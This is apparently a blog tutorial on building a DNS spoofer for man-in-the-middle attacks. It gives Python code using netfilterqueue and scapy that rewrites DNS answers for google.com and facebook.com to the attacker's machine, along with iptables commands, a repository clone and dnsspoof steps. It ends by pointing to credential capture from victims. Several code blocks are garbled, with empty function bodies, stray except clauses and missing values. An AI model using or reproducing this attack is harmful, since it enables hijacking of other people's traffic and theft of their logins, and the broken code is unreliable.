WRITING YOUR OWN DNS SPOOFER PROGRAM : Coding for Cyber Security Program №3.


How does a DNS SPOOFER work?

This is a Man-in-the middle attack so there will be three entities :

  1. The victim
  2. The attacker ( I am using Kali Linux 2020.3)
  3. The Access Point/Gateway

The victim sends requests to the Access Point, the attacker sniffs them and modifies them and send the modified malicious request to the Access Point on behalf of the victim. The attacker does this by creating a queue of packets, storing all the requests, modifying them using a program and then sending them to the Access Point.

Similarly, the responses of the Access Point are stored in a queue, modified by the attacker using a program and then sent to the victim.

We will use the netfilterqueue python module to access the packets matched by the iptables rule. Run the following command in the terminal to install netfilterqueue.

# pip install netfilterqueue

Creating a dictionary containing the Domain names to spoof and the local IP of the attacker machine.

hosts = {
b"www.google.com.": "",
b"google.com.": "",
b"facebook.com.": ""}
  1. We can accept the packets using the following code.
import netfilterqueue
# accepting the packet
def pkt_process(packet):

q = netfilterqueue.NetfilterQueue()
q.bind(0, pkt_process)

2. or drop them -

import netfilterqueue
# dropping the packet
def pkt_process(packet):
q = netfilterqueue.NetfilterQueue()
q.bind(0, pkt_process)

We will choose to accept the requests, and now working with the requests and responses. We use DNSRR (Resource record) to edit the request and DNSQR (Question Record) to edit the Response.

# handling requests and responses
def pkt_process(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.DNSRR):
print("[Before Modification ]:", scapy_packet.summary())
scapy_packet = modify_packet(scapy_packet)
except IndexError:
print("[After Modification ]:", scapy_packet.summary())


We need to modify the request and in order to do that, we will be running the following code :

# modifying the results
def modify_packet(packet):
qname = packet[scapy.DNSQR].qname
if qname not in hosts:
print("Invalid DNS Host:", qname)
return packet
packet[scapy.DNS].an = scapy.DNSRR(rrname=qname, rdata=hosts[qname])
packet[scapy.DNS].ancount = 1

Some of the fields are to be deleted from the packet as they co-relate to the original request. So, we will be using scapy module to delete them from the scapy packet that e have captured and modify them with new values of the modified packet.

# removing some fields so that scapy can recalculate them
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.UDP].len
del packet[scapy.UDP].chksum
return packet

Import os module and use it to run the iptables command :

import os
# insert the iptables FORWARD rule
os.system("iptables -I FORWARD -j NFQUEUE --queue-num {}".format(QUEUE_NUM))
q = NetfilterQueue()
q.bind(QUEUE_NUM, pkt_process)
except KeyboardInterrupt:
os.system("iptables --flush")

Our code will look like this after performing all the above steps :


Step 1 : In order to use dns spoofer program, you need to run ARP SPOOFER (explained in the previous article).


Step 2 : While ARP SPOOF is running in one terminal, open another terminal and run DNS SPOOF with the help of either of the following methods :

  1. You can use my GITHUB CODE :
# pip install netfilterqueue
# service apache2 start
# git clone https://github.com/An4ndita/dns-spoof
# cd dns-spoof
# mousepad dns.py

Edit line number 5, 6, 7 and follow the following format to enter your own domain name to be spoofed parallel to the IP of the attacker machine:

b”example.com” : “Your IP”

Now save it and run the following command :

# python3 dns.py

When the victim will surf the mentioned web pages, he will be able to see the website hosted by the attacker instead of the legitimate website.

2. You can also use the dnspoof tool inbuilt in kali linux for this purpose. Follow the following steps to use dnsspoof :

Create a file named spoofhost.txt and edit the file in the following format and save it:

<attacker’s ip> <Domain to be spoofed>

# mousepad /etc/spoofhost.txt10.0.2.15 mail* www* www.example.* *.example.com

Run the following commands :

# echo 1 > /proc/sys/net/ipv4/ip_forward (enable port forwarding)
# dnsspoof -f spoofhost.txt host and udp port 53

( is IP address of the victim machine)

Now you can see the results using wireshark if you have spoofed a website that accepts login credentials.

Thanks for reading. Hope that you find it useful 🙂🙂



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store